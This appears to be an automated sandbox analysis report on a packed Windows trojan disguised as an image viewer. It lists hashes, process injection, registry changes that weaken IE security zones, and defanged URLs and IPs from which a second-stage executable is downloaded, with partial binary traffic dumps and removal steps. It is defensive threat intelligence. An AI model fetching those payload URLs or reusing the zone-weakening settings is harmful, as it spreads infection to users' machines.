MD5: e47ea8261099c8ee573d946443857d5a
SHA1: 702ec12f7b32710158f075c2b83e15120af2a389
SHA256: 87e1703feabf2e1396dc8d46902ce8988375c7615f0ca5626d73bc37cba8d38b
SSDeep: 24576:BbtRvf3U1XjwG7vOp xu0TZib o Ev3z9:pLvf3U1XjwmOp xxt 3z9
Size: 832512 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: no certificate found
Created at: 2015-01-05 19:49:31
Analyzed on: WindowsXPESX SP3 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

59t6pc.exe:516

The Trojan injects its code into the following process(es):

%original file name%.exe:1960
rundll32.exe:1908

Mutexes

The following mutexes were created/opened:

ZonesLockedCacheCounterMutex
ZonesCacheCounterMutex
ZonesCounterMutex
RasPbFile
ShimCacheMutex

File activity

The process %original file name%.exe:1960 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\59t6pc.exe (12348 bytes)

The process 59t6pc.exe:516 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\59t6pc.png (25 bytes)

Registry activity

The process %original file name%.exe:1960 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D7 04 3F 2E FE 02 BE AD 64 C6 01 45 F0 62 1D 7B"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{5c14c4f6-74da-11e2-81b0-000c29ec7fc5}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1]
"Temp/59t6pc.exe" = "59t6pc"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process 59t6pc.exe:516 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "38 F6 D8 0A 8A 8F EA 05 27 ED F8 25 A4 E7 F6 CD"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{5c14c4f6-74da-11e2-81b0-000c29ec7fc5}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"shimgvw.dll" = "Windows Picture and Fax Viewer"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The process rundll32.exe:1908 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "45 97 29 AC 15 FB EC 7B 4D 17 68 4F 71 6A FD 51"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{5c14c4f6-74da-11e2-81b0-000c29ec7fc5}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

Dropped PE files

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: NVIDIA Corporation
Product Name: Service
Product Version: 1.4.3.0
Legal Copyright: Microsoft Coprporation (c) 2014
Legal Trademarks: Image
Original Filename: ScreenViewer.exe
Internal Name: ScreenViewer.exe
File Version: 1.4.3.0
File Description: Screenshotter
Comments: Image Viewer
Language: Language Neutral

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://ge.tt/api/1/files/85wK5182/0/blob?download	54.195.252.180
hxxp://open.ge.tt/1/files/85wK5182/0/blob?download
hxxp://ec2-54-228-6-8.eu-west-1.compute.amazonaws.com/streams/85wK5182/231231243513.exe?sig=-Ur3PHKNfynjS3fJIFyxH-1d28l6cXEqFxA&type=download
hxxp://w056556.blob4.ge.tt/streams/85wK5182/231231243513.exe?sig=-Ur3PHKNfynjS3fJIFyxH-1d28l6cXEqFxA&type=download	54.228.6.8
hxxp://w428894.open.ge.tt/1/files/85wK5182/0/blob?download	54.247.122.87

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

GET /api/1/files/85wK5182/0/blob?download HTTP/1.1

Host: ge.tt

Connection: Keep-Alive

HTTP/1.1 307 Temporary Redirect

location: hXXp://w428894.open.ge.tt/1/files/85wK5182/0/blob?download

Connection: keep-alive

Transfer-Encoding: chunked
0..

GET /streams/85wK5182/231231243513.exe?sig=-Ur3PHKNfynjS3fJIFyxH-1d28l6cXEqFxA&type=download HTTP/1.1

Host: w056556.blob4.ge.tt

Connection: Keep-Alive

HTTP/1.1 200 OK

date: Sat, 17 Jan 2015 09:18:08 GMT

last-modified: Mon, 05 Jan 2015 17:37:38 GMT

etag: "3742e2634ee802968c7e307bc1563cab-1"

accept-ranges: bytes

content-type: application/x-msdownload

content-length: 457216

server: gbs

access-control-allow-origin: *

content-disposition: attachment

Connection: keep-alive
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..L......T
................................. ........@.. .......................`
[email protected].... ..&...........
[email protected]................................................ ....
........... ..H............text........ ...................... ..`.sda
[email protected]...&.... ....................
..@[email protected].......@[email protected]........................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
....................................................H.......H2..N~....
...........E...........................................(....*..(....*.
.0.............*.0.............*.0.............*.0.............*.0....
.........*.0.............*....*.......*.......*.......*.......*.......
*.......*.......*.......*....(....*..0.............*....*....0........
.....*....*....0.............*.0.............*....*....0.............*
.0.............*AL.................. ...............O....... .........
..z.......R... ........0.............*.0.............*.0..........
<<< skipped >>>

GET /1/files/85wK5182/0/blob?download HTTP/1.1

Host: w428894.open.ge.tt

Connection: Keep-Alive

HTTP/1.1 307 Temporary Redirect

location: hXXp://w056556.blob4.ge.tt/streams/85wK5182/231231243513.exe?sig=-Ur3PHKNfynjS3fJIFyxH-1d28l6cXEqFxA&type=download

connection: keep-alive

transfer-encoding: chunked
0..

The Trojan connects to the servers at the folowing location(s):

.text

`.data

.rsrc

msvcrt.dll

KERNEL32.dll

NTDLL.DLL

GDI32.dll

USER32.dll

IMAGEHLP.dll

rundll32.pdb

.....eZXnnnnnnnnnnnn3

....eDXnnnnnnnnnnnn3

...eDXnnnnnnnnnnnn,

.eDXnnnnnnnnnnnn,

%Xnnnnnnnnnnnnnnn1

O3$dS7"%U9

.manifest

5.1.2600.5512 (xpsp.080413-2105)

RUNDLL.EXE

Windows

Operating System

5.1.2600.5512

YThere is not enough memory to run the file %s.

Please close other windows and try again.

9The file %s or one of its components could not be opened.

0The file %s or one of its components cannot run.

MThe file %s or one of its components requires a different version of Windows.

UThe file %s or one of its components cannot run in standard or enhanced mode Windows.3Another instance of the file %s is already running./An exception occurred while trying to run "%s"

Error in %s

Missing entry:%s

Error loading %s

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Terminate malicious process(es) (How to End a Process With the Task Manager):
   

   59t6pc.exe:516
   

2. Delete the original Trojan file.
   
3. Delete or disinfect the following files created/modified by the Trojan:
   

   %Documents and Settings%\%current user%\Local Settings\Temp\59t6pc.exe (12348 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\59t6pc.png (25 bytes)

4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
   
5. Reboot the computer.
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.